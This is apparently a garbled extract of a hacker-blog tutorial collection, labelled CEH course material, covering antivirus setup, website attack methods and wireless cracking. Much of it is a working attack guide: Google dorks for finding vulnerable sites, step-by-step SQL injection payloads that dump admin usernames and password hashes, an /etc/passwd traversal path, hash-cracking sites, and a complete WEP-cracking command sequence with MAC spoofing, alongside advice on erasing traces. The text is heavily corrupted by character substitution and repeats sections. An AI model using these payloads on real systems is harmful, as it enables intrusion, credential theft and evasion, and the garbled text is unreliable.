his system for these they download all type of shit from the internet and believe me

??.?D of this shit contains viruses and #ro'ans that sends your information to the

providers. ow I don4t say that stop hacking but try to follow some basic steps to learn

hacking and first of all you must know how to protect yourself from such type of fake

software4s. "or its solution read on article.




ow after discussing the things ;ow you system is got infected by your simple

negligence. Its time You should Fnow ;ow to fix them and protect your system from all

types of viruses and tro'ans.

.OW TO STOP VIR1S OR TRO#ANS ??

0+ 1sing Good Anti3irus&#here is a nice misconception between the internet users that full antivirus provides

better security. Ya its 3==D truth but full antiviruses paid ones not the cracked ones.

#here are several other solutions to them that you will get for absolutely "ree and I

guarantee that it will protect your system 3==D 'ust doing some little configurations.

"est Free Anti3irus & -vira Personal -ntivirus i.e -ntivir.

You can download avira for free from $

http$//www.filehippo.com/downloadGantivir/

ow after downloading the antivirus what you have to do to make it as good as paid

antiviruses.

a. Install the antivirus and update it. ote updating antivirus regularly is compulsory.

&on4t worry its not your work it will update itself automatically whenever update is

available.

b. -fter Installing at the right hand top corner you will see a H!*"IC(-#I* button.

Just click on it now a new window will pop up.

c. ow #here at left hand top you will see a click box in front of Axpert is written . !lick

on that now you will see several things in it. ow do the following setting one by one.

3. !lick on HScanner click on all files and set the HScanner Priority to high and click on

apply.

>. !lick on HCuard and click on all files and click on HScan while reading and writing and

then click apply.

@. !lick on HCeneral ow click on select all and click on apply. In general tab only go to

EI section and click on advanced process protection and then click on apply.

2. -fter doing that restart your P!.

ow you have made your free antivirus an e)uivalent to the paid one..

"est Free Anti5S2yware& Spyware #erminator with crawler eb security toolbar.

&ownload It for free $






#he solution of this problem is already provided eb browser Security toolbar will help

you in surfing only secured and genuine websites and if you want to visit and download

0irus #otal will help you to identify the file whether its infected or not.

*+ Now 'or .acker ike /e i+e %ethod to useor test .ack toos+

hy I have mentioned this is simply because ;ackers always take benefit of these

noobish tricks that they attach viruses with files and name them as hack tools . So avoid

them if you are too curious like me. #hen there are several ways to ;andle it.

3. (se &eep "ree+e on ! drive$ "or testing ;ack tools always use deep free+e as after

the next restart your system will be at same position as it was previous.

>. Install 0irtual 7ox and over virtual box install another indows and test all hack tools

using virtual windows. #his will protect your system from being infected. -lso It will give

you more knowledge about handling the viruses and other situations like when

something wrong is done what i have to do.

@. !reate two to three fake email I&4s and use them for testing Feyloggers and other

fake email hacking software4s.

"or Some more security #ips you can also read my previous article$

HACKIN/ WEB ,ER:ER

Hello friends , welcome back to hacking class, today i will e"plain all the methods that are

being used to hack a website or websites database. %his is the first part of the class @How to

hack a website or ebsites databaseA and in this i will introduce all website hacking

methods. %oday # will give you the overview and in later classes we will discuss them one by

one with practical e"amples. o guys get ready for first part of Hacking websites class.

Don*t worry i will also tell you how to protect your websites from these attacks and other

methods like hardening of C& and hardening of web servers and key knowledge about

H)1D rights that what thing should be give what rights

ote : This !ost is only for "#ucational $ur!oseonly%




&hat are 'asic things you shoul# kno( 'efore

(e'site hacking)'irst of all everything is optional as i will start from very scratch. But you need atleast basic

knowledge of following things..

;. Basics of H%)&, C&, PHP.

>. Basic knowledge of avascript.

2. Basic knowledge of servers that how servers work.

E. !nd most important e"perti$e in removing traces otherwise u have to suffer conse8uences.

Now 'irst two things you can learn from a very famous website for basics of ebsite design

with basics of H%)&,C&,PHP and (avascript.

http/FFwww.w2schools.comF

!nd for the fourth point that you should be e"pert in removing traces . 'or this you can refer

to first G hacking classes and specially read these two

;. Hiding ourself from being traced.


http://www.w3schools.com/




>. 7emoving your %races

!s we know traces are very important. Please don*t ignore them otherwise you can be in big

trouble for simply doing nothing. so please take care of this step.

M"TH*+S *F HAC,-. &"BS-T":

;. C& #N6%#1N

>. 71 #%6 7#P%#N<

2. 76)1%6 '#&6 #N&0#1N

E. &1!& '#&6 #N&0#1N

G. DD1 !%%!5

4. 6IP&1#%#N< 0&N67!B#&#%.

/% S0L -1"CT-*

'irst of all what is C& in(ectionJ C& in(ection is a type of security e"ploit or loophole in

which a attacker @in(ectsA C& code through a web form or manipulate the 07&*s based on

C& parameters. #t e"ploits web applications that use client supplied C& 8ueries.

%he primary form of C& in(ection consists of direct insertion of code into user-input variables that

are concatenated with C& commands and e"ecuted. ! less direct attack in(ects malicious code into

strings that are destined for storage in a table or as metadata. hen the stored strings are

subse8uently concatenated into a dynamic C& command, the malicious code is e"ecuted.

&hat are 'asic things you shoul# kno( 'efore (e'site hacking)

'irst of all everything is optional as i will start from very scratch. But you need atleast basic

knowledge of following things..

;. Basics of H%)&, C&, PHP.

>. Basic knowledge of avascript.

2. Basic knowledge of servers that how servers work.




E. !nd most important e"perti$e in removing traces otherwise u have to suffer conse8uences.

Now 'irst two things you can learn from a very famous website for basics of ebsite design

with basics of H%)&,C&,PHP and (avascript.

http/FFwww.w2schools.comF

!nd for the fourth point that you should be e"pert in removing traces . 'or this you can refer

to first G hacking classes and specially read these two

;. Hiding ourself from being traced.

>. 7emoving your %races

!s we know traces are very important. Please don*t ignore them otherwise you can be

in big trouble for simply doing nothing. so please take care of this step.

M"TH*+S *F HAC,-. &"BS-T":

;. C& #N6%#1N

>. 71 #%6 7#P%#N<2. 76)1%6 '#&6 #N&0#1N

E. &1!& '#&6 #N&0#1N

G. DD1 !%%!5

4. 6IP&1#%#N< 0&N67!B#&#%.

/% S0L -1"CT-* 'irst of all what is C& in(ectionJ C& in(ection is a type of security e"ploit or

loophole in which a attacker @in(ectsA C& code through a web form or manipulatethe 07&*s based on C& parameters. #t e"ploits web applications that use client

supplied C& 8ueries.

%he primary form of C& in(ection consists of direct insertion of code into user-input variables that

are concatenated with C& commands and e"ecuted. ! less direct attack in(ects malicious code into

strings that are destined for storage in a table or as metadata. hen the stored strings are

subse8uently concatenated into a dynamic C& command, the malicious code is e"ecuted.

2% C3*SS S-T" SC3-$T-. ross site scripting 9I: occurs when a user inputs malicious data into a website,

which causes the application to do something it wasn*t intended to do. I attacks






are very popular and some of the biggest websites have been affected by them

including the 'B#, NN, 6bay, !pple, )icrosft, and !1&.

ome website features commonly vulnerable to I attacks are/

K earch 6ngines

K &ogin 'ormsK omment 'ields

ross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side

security mechanisms normally imposed on web content by modern browsers. By finding ways of

in(ecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive

page content, session cookies, and a variety of other information maintained by the browser on behalf

of the user. ross-site scripting attacks are therefore a special case of code in(ection.

# will e"plain this in detail in later hacking classes. o keep reading..

4% 3"M*T" F-L" -CL5S-*7emote file inclusion is the most often found vulnerability on the website.

7emote 'ile #nclusion 97'#: occurs when a remote file, usually a shell 9a graphical interface for

browsing remote files and running your own code on a server:, is included into a website which allows

the hacker to e"ecute server side commands as the current logged on user, and have access to files on

the server. ith this power the hacker can continue on to use local

e"ploits to escalate his privileges and take over the whole system.

7'# can lead to following serious things on website /

• ode e"ecution on the web server

• ode e"ecution on the client-side such as avascript which can lead to other attacks such as

cross site scripting 9I:.

• Denial of ervice 9Do:

• Data %heftF)anipulation

6% L*CAL F-L" -CL5S-* &ocal 'ile #nclusion 9&'#: is when you have the ability to browse through the server by means of

directory transversal. 1ne of the most common uses of &'# is to discover the FetcFpasswd file. %his file

contains the user information of a &inu" system. Hackers find sites vulnerable to &'# the same way #

discussed for 7'#*s.

&et*s say a hacker found a vulnerable site, www.target-site.comFinde".phpJpLabout, by means of

directory transversal he would try to browse to the FetcFpasswd file/

www.target-site.comFinde".phpJpL ..F..F..F..F..F..F..FetcFpasswd

# will e"plain it in detail with practical websites e"ample in latter se8uential classes on ebsite

Hacking.

7% ++*S ATTAC,




imply called distributed denial of service attack. ! #enial8of8ser9ice attack 9+oS attack :

or#istri'ute# #enial8of8ser9ice attack 9++oS attack : is an attempt to make a computer

resource unavailable to its intended users. !lthough the means to carry out, motives for, and targets of

a Do attack may vary, it generally consists of the concerted efforts of a person or people to prevent an

#nternet site or service from functioning efficiently or at all, temporarily or indefinitely. #n DD1

attack we consumes the bandwidth and resources of any website and make it unavailable to its

legitimate users.

'or more detailed hack on DD1 visit/

%";$L*T-. V5L"3AB-L-T< #ts not a new category it comprises of above five categories but i mentioned it separately because there

are several e"ploits which cannot be covered in the above five categories. o i will e"plain them

individually with e"amples. %he basic idea behind this is that find the vulnerability in the website and

e"ploit it to get the admin or moderator privileges so that you can manipulate the things easily.

S'( IN)ECTION

Hello friends in my previous class of How to hack websites, there i e"plained the

various topics that we will cover in hacking classes. &et*s today start with the first

topic Hacking ebsites using C& in(ection tutorial. #f you have missed the previous

hacking class don*t worry read it here.

o guys let*s start our tutorial of Hacking ebsites using C& in(ection techni8ue.

'irst of all, i will provide you the brief introduction about C& in(ection.

ote: This article is for "#ucational $ur!oses only% $lease +on=t misuse

it% -soft#l an# me are not res!onsi'le of any misuse #one 'y you%

)yC& database is very common database system these days that websites use and

you will surprise with the fact that its the most vulnerable database system ever.#ts




has unlimited loopholes and fi"ing them is a very tedious task. Here we will discuss

how to e"ploit those vulnerabilities manually without any tool.

Hacking ebsites using C& #n(ection

ST"$S T* HAC, &"BS-T"S 5S-. S0L

-1"CT-*

/% Fin#ing the target an# 9ulnera'le (e'sites

'irst of all we must find out our target website. # have collected a lot of dorks i.e the

vulnerability points of the websites. ome <oogle earches can be awesomely utili$ed

to find out vulnerable ebsites.. Below is e"ample of some 8ueries..

"xam!les: *!en the .oogle an# co!y !aste these >ueries?

inurl/inde".phpJidL

inurl/trainers.phpJidL




inurl/buy.phpJcategoryL

inurl/article.phpJ#DL

inurl/playMold.phpJidL

inurl/declarationMmore.phpJdeclMidL

inurl/pageidL

inurl/games.phpJidL

inurl/page.phpJfileL

inurl/newsDetail.phpJidL

inurl/gallery.phpJidL

earch google for more google dorks to hack websites. # cannot put them on my

website as they are too critical to discuss. e can discuss them in comments of this

posts so keep posting and reading there.

2% Checking for Vulnera'ility on the (e'site

uppose we have website like this/-




hp/FFwww.site.comFproducts.phpJidLO

%o test this 07&, we add a 8uote to it

hp/FFwww.site.comFproducts.phpJidLO*

1n e"ecuting it, if we get an error like this/ @ou have an error in your C& synta"Qcheck the manual that corresponds to your )yC& server version for the right

etcA1r something like that, that means the target website is vulnerable to s8l

in(ection and you can hack it.

4@% Fin# the num'er of columns

%o find number of columns we use statement 17D67 B 9tells database how to

order the result: so how to use itJ ell (ust incrementing the number until we get an

error.

hp/FFwww.site.comFproducts.phpJidLG order by ;F RS no error

hp/FFwww.site.comFproducts.phpJidLG order by >F RS no error

hp/FFwww.site.comFproducts.phpJidLG order by 2F RS no error

hp/FFwww.site.comFproducts.phpJidLG order by EF RS 6rror 9we get message like

this 0nknown column E* in order clause* or something like that:




that means that the it has 2 columns, cause we got an error on E.

6@% Check for 5-* function

ith union we can select more data in one s8l statement.

o we have

hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2F

9we already found that number of columns are 2 in section >:. :

if we see some numbers on screen, i.e ; or > or 2 then the 0N#1N works .

7@% Check for MyS0L 9ersion

hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2F

N1%6/ if F not working or you get some error, then try T

it*s a comment and it*s important for our 8uery to work properly.

&et say that we have number > on the screen, now to check for version

we replace the number > with UUversion or version9: and get someting like E.;.22-

log or G.=.EG or similar.

it should look like this




hp/FFwww.site.comFproducts.phpJidLG union all select ;,UUversion,2F

#f you get an error @union V illegal mi" of collations 9#)P&##% V 167#B&6: A

# didn*t see any paper covering this problem, so i must write it .

hat we need is convert9: function

i.e.

hp/FFwww.site.comFproducts.phpJidLG union all select ;,convert9UUversion

using latin;:,2F

or with he"9: and unhe"9:

i.e.

hp/FFwww.site.comFproducts.phpJidLG union all select

;,unhe"9he"9UUversion::,2F

and you will get )yC& version .

@% .etting ta'le an# column name

ell if the )yC& version is less than G 9i.e E.;.22, E.;.;>: WT later i will describe

for )yC& greater than G version.

we must guess table and column name in most cases.

common table names are/ userFs, adminFs, memberFs

common column names are/ username, user, usr, userMname, password, pass,

passwd, pwd etci.e would be




hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2 from adminF

9we see number > on the screen like before, and that*s good :

e know that table admin e"ists

Now to check column names.

hp/FFwww.site.comFproducts.phpJidLG union all select ;,username,2 from

adminF

9if you get an error, then try the other column name:

we get username displayed on screen, e"ample would be admin, or superadmin etc

now to check if column password e"ists

hp/FFwww.site.comFproducts.phpJidLG union all select ;,password,2 from

adminF

9if you get an error, then try the other column name:

we seen password on the screen in hash or plain-te"t, it depends of how the database

is set up

i.e mdG hash, mys8l hash, sha;

Now we must complete 8uery to look nice'or that we can use concat9: function 9it (oins strings:

i.e


;,concat9username,="2a,password:,2 from adminF

Note that i put ="2a, its he" value for / 9so ="2a is he" value for colon:




9there is another way for that, char9G3:, ascii value for / :


;,concat9username,char9G3:,password:,2 from adminF

Now we get displayed username/password on screen, i.e admin/admin or

admin/somehash

hen you have this, you can login like admin or some superuser.

#f can*t guess the right table name, you can always try mys8l.user 9default:

#t has user password columns, so e"ample would be


;,concat9user,="2a,password:,2 from mys8l.userF

@% MyS0L 7

&ike i said before i*m gonna e"plain how to get table and column names

in )yC& greater than G.

'or this we need informationMschema. #t holds all tables and columns in database.

%o get tables we use tableMname and informationMschema.tables.

i.e

hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 from

informationMschema.tablesF




Here we replace the our number > with tableMname to get the first table from

informationMschema.tables

displayed on the screen. Now we must add &#)#% to the end of 8uery to list out all

tables.

i.e


informationMschema.tables limit =,;F

note that i put =,; 9get ; result starting from the =th:

now to view the second table, we change limit =,; to limit ;,;

i.e


informationMschema.tables limit ;,;F

the second table is displayed.

for third table we put limit >,;

i.e

hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 frominformationMschema.tables limit >,;F

5eep incrementing until you get some useful like dbMadmin, pollMuser, auth,

authMuser etc

%o get the column names the method is the same.




Here we use columnMname and informationMschema.columns

the method is same as above so e"ample would be

hp/FFwww.site.comFproducts.phpJidLG union all select ;,columnMname,2 from

informationMschema.columns limit =,;F

%he first column is diplayed.

%he second one 9we change limit =,; to limit ;,;:

ie.


informationMschema.columns limit ;,;F

%he second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc

#f you wanna display column names for specific table use this 8uery. 9where clause:

&et*s say that we found table users.

i.e


informationMschema.columns where tableMnameL*users*F

Now we get displayed column name in table users. ust using &#)#% we can list all

columns in table users.

Note that this won*t work if the magic 8uotes is 1N.&et*s say that we found colums user, pass and email.




Now to complete 8uery to put them all together.

'or that we use concat9: , i decribe it earlier.

i.e


;,concat9user,="2a,pass,="2a,email: from usersF

hat we get here is user/pass/email from table users.

6"ample/ admin/hash/whateverUblabla.com

But the passwords are in hash format so we need to crack the hash. Note X=Y of hash

are crackable but ;=Y are still there which are unable to crack. o don*t feel bad if

some hash doesn*t crack.

For Cracking the M+7 hash 9alues you can usethis :

;: heck the net whether this hash is cracked before/

Download/

http/FFwww.mdGdecrypter.co.uk

>: rack the password with the help of a site/

Download//




http/FFwww.milw=rm.comFcrackerFinsert.php

or

http/FFpasscracking.comFinde".php

2: 0se a )DG cracking software/

Download/

http/FFrapidshare.comFfilesF;24X4OX4'M>.;=M>b.rar

$ass(or# *(lsest

ST"$S T* HAC, &-F- *3 &-3"L"SS $ASS&*3+

;. <et the Backtrack-&inu" D. Backtrack &inu" &ive D9best &inu" available for hackers

with more than >=== hacking tools inbuilt:.

Download Backtrack &inu" &ive D from here/ &#5 H676

2% SCA T* ."T TH" V-CT-M

<et the victim to attack that is whose password you want to hack or crack.

Now 6nter the Backtrack &inu" D into your D drive and start it. 1nce its started click on

the black bo" in the lower left corner to load up a ,*S*L"D . Now you should start your

ifi card. %o do it so type

airmon-ng

ou will see the name of your wireless card. 9mine is named @ath=A: 'rom here on out,replace @ath=A with the name of your card. Now type

airmon-ng stop ath=

then type/


http://www.backtrack-linux.org/downloads/





ifconfig wifi= down

then type/

macchanger Rmac ==/;;/>>/22/EE/GG wifi=

then type/

airmon-ng start wifi=

%he above steps i have e"plained is to spoof yourself from being traced. #n above step

we are spoofing our )! address, this will keep us undiscovered.

Now type/

airodump-ng ath=

!ll above steps in one screen shot/




Now you will see a list of wireless networks in the 5onsole. ome will have a better

signal than others and its always a good idea to pick one that has a best signalstrength otherwise it will take huge time to crack or hack the password or you may

not be able to crack it at all.

1nce you see the networks list, now select the network you want to hack. %o free$e

the airodump screen H1&D the N%7& key and Press .

Now you will see something like this/




4% S"L"CT-. "T&*3, F*3 HAC,-.Now find the network that you want to crack and )!56 076 that it says theencryption for that network is 6P. #f it says P! or any variation of P! then

move onyou can still crack P! with backtrack and some other tools but it is a

whole other ball game and you need to master 6P first.




1nce you*ve decided on a network, take note of its channel number and bssid. %he

bssid will look something like this T

==/>2/4X/bb/>d/of

%he hannel number will be under a heading that says @HA. !s shown in this figure/




Now in the same 51N1&6 window type/

airodump-ng -c (channel) -w (file name) –bssid (bssid) ath0

%he file name can be whatever you want. %his file is the place where airodump is

going to store the packets of info that you receive to later crack. ou don*t even put in

an e"tension(ust pick a random word that you will remember. # usually make mine

@BenA because # can always remember it. #ts simply because i love

ben;=.hhahahahaha /D

Note/ #f you want to crack more than one network in the same session, you must have

different file names for each one or it won*t work. # usually name them as ben;, ben>

etc.

1nce you typed in that last command, the screen of airodump will change and start

to show your computer gathering packets. ou will also see a heading marked @#A

with a number underneath it. %his stands for @#nitiali$ation ectorA but in general

terms all this means is @packets of info that contain characters of the password.A

1nce you gain a minimum of G,=== of these #*s, you can try to crack the password.

#*ve cracked some right at G,=== and others have taken over 4=,===. #t (ust depends

on how long and difficult they made the password. )ore difficult is password more

packets you will need to crack it.

6% Cracking the &"$ !ass(or#




Now leave this 5onsole window up and running and open up a >nd 5onsole window.

#n this window type/

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44: ath0

%his will send some commands to the router that basically it is to associate your

computer even though you are not officially connected with the password. #f this

command is successful, you should see about E lines of te"t print out with the last

one saying something similar to @!ssociation uccessful /-:A

#f this happens, then good+ ou are almost there.

Now type/

aireplay-ng -2 -b 9bssid: -h ==/;;/>>/22/EE/GG ath=

%his will generate a bunch of te"t and then you will see a line where your computer is

gathering a bunch of packets and waiting on !7P and !5. Don*t worry about what

these mean(ust know that these are your meal tickets. Now you (ust sit and wait.

1nce your computer finally gathers an !7P re8uest, it will send it back to the router

and begin to generate hundreds of !7P and !5 per second. ometimes this startsto happen within secondssometimes you have to wait up to a few minutes. ust be

patient. hen it finally does happen, switch back to your first 5onsole window and

you should see the number underneath the # starting to rise rapidly. %his is great+ #t

means you are almost finished+ hen this number reaches !% &6!% G,=== then

you can start your password crack. #t will probably take more than this but # always

start my password cracking at G,=== (ust in case they have a really weak password.

Now you need to open up a 2rd and final 5onsole window. %his will be where we

actually crack the password.Now type/

aircrack-ng -b 9bssid: 9filename:-=;.cap

7emember the file name you made up earlierJ )ine was @BenA. Don*t put a space in

between it and -=;.cap here. %ype it as you see it. o for me, # would type wepkey-

=;.cap

1nce you have done this you will see aircrack fire up and begin to crack the

password. typically you have to wait for more like ;=,=== to >=,=== #*s before it will

crack. #f this is the case, aircrack will test what you*ve got so far and then it will say

something like @not enough #*s. 7etry at ;=,===.A




D1N*% D1 !N%H#N<+ #t will stay runningit is (ust letting you know that it is on

pause until more #*s are gathered. 1nce you pass the ;=,=== mark it will

automatically fire up again and try to crack it. #f this fails it will say @not enough #*s.

7etry at ;G,===.A and so on until it finally gets it.

#f you do everything correctly up to this point, before too long you will have thepassword+ now if the password looks goofy, dont worry, it will still work. some

passwords are saved in !## format, in which case, aircrack will show you e"actly

what characters they typed in for their password. ometimes, though, the password

is saved in H6I format in which case the computer will show you the H6I

encryption of the password. #t doesn*t matter either way, because you can type in

either one and it will connect you to the network.

%ake note, though, that the password will always be displayed in aircrack with a

colon after every > characters. o for instance if the password was @secretA, it would

be displayed as/

se:cr:et

%his would obviously be the !## format. #f it was a H6I encrypted password that

was something like @='5XE>O'A then it would still display as/

0!:"#:$4:2%:&!




ust omit the colons from the password, boot back into whatever operating system

you use, try to connect to the network and type in the password without the colons

and presto+ ou are in+

#t may seem like a lot to deal with if you have never done it, but after a few successful

attempts, you will get very 8uick with it. #f # am near a 6P encrypted router with a

good signal, # can often crack the password in (ust a couple of minutes.

# am not responsible for what you do with this information. !ny maliciousFillegal

activity that you do, falls completely on you becausetechnicallythis is (ust for you

to test the security of your own network.

# hope you all liked it. #f you have any 8ueries then ask me.

Documents

CEH Course Material